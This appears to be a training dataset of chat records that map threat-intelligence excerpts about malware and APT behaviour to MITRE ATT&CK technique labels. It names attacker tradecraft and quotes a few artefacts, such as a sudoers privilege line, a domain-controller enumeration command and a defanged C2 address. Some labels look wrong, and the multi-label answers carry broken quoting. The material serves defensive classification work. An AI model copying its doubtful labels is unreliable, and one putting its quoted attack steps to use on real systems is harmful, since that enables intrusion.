- "content": "Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. By ensuring that the process is not running under NT AUTHORITY, the developers are assuming the process is not running under another account and therefore can be written to. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information about the victim's IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leverages cmd.exe to perform discovery techniques."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 server address is not embedded directly inside Tomiris: instead, it connects to a signalization server that provides the URL and port to which the backdoor should connect. Then Tomiris sends GET requests to that URL until the C2 server responds with a JSON object of the following structure"
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Part of 's operation involved using modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to \"cmd /C\"."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another malware sample XORs C2 traffic. malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, evading SSL man-in-the-middle decryption attacks."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot can delete its configuration file after installation."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PipeMon installer has modified the Registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\" to install PipeMon as a Print Processor."
- },
- {
- "role": "assistant",
- "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This second request (Encoded Get System Information Request) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers, which uses a four-byte XOR encoding. Before acting on the request, Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography', 'T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves can obtain information about network parameters."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can steal access tokens from exiting processes."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3 Targeted lure content In one of the documents, the victim is presented with what appears to be an obfuscated document with the NATO EOD seal and text alluding to the targeted nation state"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used malicious links to direct users to web pages designed to harvest credentials."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist can collect the computer name of a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has collected the victim host information after infection."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks."
- },
- {
- "role": "assistant",
- "content": "T1589.001 - Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IronNetInjector has the ability to decrypt embedded .NET and PE payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the API call ShellExecuteW for execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has used `regsvr32` to execute scripts."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used \"nltest.exe /dclist\" to retrieve a list of domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peppy can identify specific files for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy uses PowerShell commands to download and execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one case, the attackers sent a malicious document which was nearly identical to a legitimate attachment which we observed later being sent to the same recipient"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete services from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it’s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling ‘fudpages’, was found during this campaign activity based on their utilization of shared infrastructure. One specific Microsoft document drew our attention. 446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25) This Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore can persist via a LaunchDaemon."
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has obtained and used tools such as Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "13 14 ams_api64.dll ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Host enumeration and lateral movement After gaining an initial foothold in a compromised environment, the threat actors quickly identify and explore accessible systems"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. Modules used for spreading inside a local network of compromised machines via SMB. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bonadan can create bind and reverse shells on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok adds \"admin ALL=(ALL) NOPASSWD: ALL\" to the \"/etc/sudoers\" file."
- },
- {
- "role": "assistant",
- "content": "T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download): upload.bat, a batch script that the compromised machine will execute upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC The threat actor will then download the results and then delete the files from the cloud storage account"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can execute tasks via OLE."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy creates an entry in a Registry Run key for the malware to execute on startup."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Forensic examination of a computer infected with a banking trojan Oleg Skulkin Senior Digital Forensics Analyst at Group-IB Where did it all start. Since then, phishing emails distributing the trojan have been sent to potential victims with admirable persistence. In this article, I am going to show how to perform forensic analysis of an image of a computer infected with the RTM banking trojan. Let's try to find registry files, such as SOFTWARE, for example. Let's recall Jesse Kornblum's paradox: \"Malware can hide, but it must run\". A good start will be to look for potential persistence mechanisms that can be used by the malware to restart after reboot. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. Let's start with low-hanging fruits, the so-called run keys: The partition was last modified on November 7th, and we see that when a user logs in, the apg.exe file is executed from a very suspicious location. Let's see what else we can find in the b7mg81 directory: TeamViewer. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth collects the external IP address from the system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a function for decrypting data containing C2 configuration information."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Unleash the main payload: The msrun.bat script is responsible for unleashing the Wiper. It moves wiper-related files to “C:\\temp” and creates a scheduled task named mstask to execute the wiper only once at 23:55:00"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET performs AES-CBC encryption on files under \"~/Documents\", \"~/Downloads\", and\n\"~/Desktop\" with a fixed key and renames files to give them a \".enc\" extension. Only files with sizes \nless than 500MB are encrypted."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Users are advised to avoid opening attachments and click links on unsolicited emails"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has created accounts with \"net user\"."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Messages are encrypted using AES with a static key"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has modified file and directory timestamps."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "0x007CFABF video Desktop video recording 0x06E533C4 download Downloads executable and injects into new process 0x00684509 ammyy Ammyy Admin tool 0x07C6A8A5 update Updates self 0x0B22A5A7 Add/Update klgconfig (analysis incomplete) 0x0B77F949 httpproxy Starts HTTP proxy 0x07203363 killos Renders computer unbootable by wiping the MBR 0x078B9664 reboot Reboots the operating system 0x07BC54BC tunnel Creates a network tunnel 0x07B40571 adminka Adds new C2 server or proxy address for pseudo-HTTP protocol 0x079C9CC2 server Adds new C2 server for custom binary protocol 0x0007C9C2 user Creates or deletes Windows user account 0x000078B0 rdp Enables concurrent RDP (analysis incomplete) 0x079BAC85 secure Adds Notification Package (analysis incomplete) 0x00006ABC del Deletes file or service 0x0A89AF94 startcmd Adds command to the configuration file (see the Configuration section) 0x079C53BD runmem Downloads executable and injects directly into new process 0x0F4C3903 logonpasswords Send Windows accounts details to the C2 server 0x0BC205E4 screenshot Takes a screenshot of the desktop and sends it to the C2 server 0x007A2BC0 sleep Backdoor sleeps until specified date 0x0006BC6C dupl Unknown 0x04ACAFC3 Upload files to the C2 server 0x00007D43 vnc Runs VNC plugin 0x09C4D055 runfile Runs specified executable file 0x02032914 killbot Uninstalls backdoor 0x08069613 listprocess Returns list of running processes to the C2 server 0x073BE023 plugins Change C2 protocol used by plugins 0x0B0603B4 Download and execute shellcode from specified address 0x0B079F93 killprocess Terminates the first process found specified by name 0x00006A34 cmd Initiates a reverse shell to the C2 server 0x09C573C7 runplug Plugin control 0x08CB69DE autorun Updates backdoor Table 2: Supported Commands Configuration A configuration file resides in a file under the backdoor’s installation directory with the .bin extension"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel', 'T1105 - Ingress Tool Transfer', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be configured to use HTTP or DNS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script itself decodes and executes a large blob of base64-encoded text and converts it into a huge byte array"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An older version of has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malware sample adds persistence on the system by creating a shortcut in the user’s Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Winnti for Windows implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RGDoor uses cmd.exe to execute commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During FunnyDream, the threat actors used `cmd.exe` to execute the wmiexec.vbs script."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
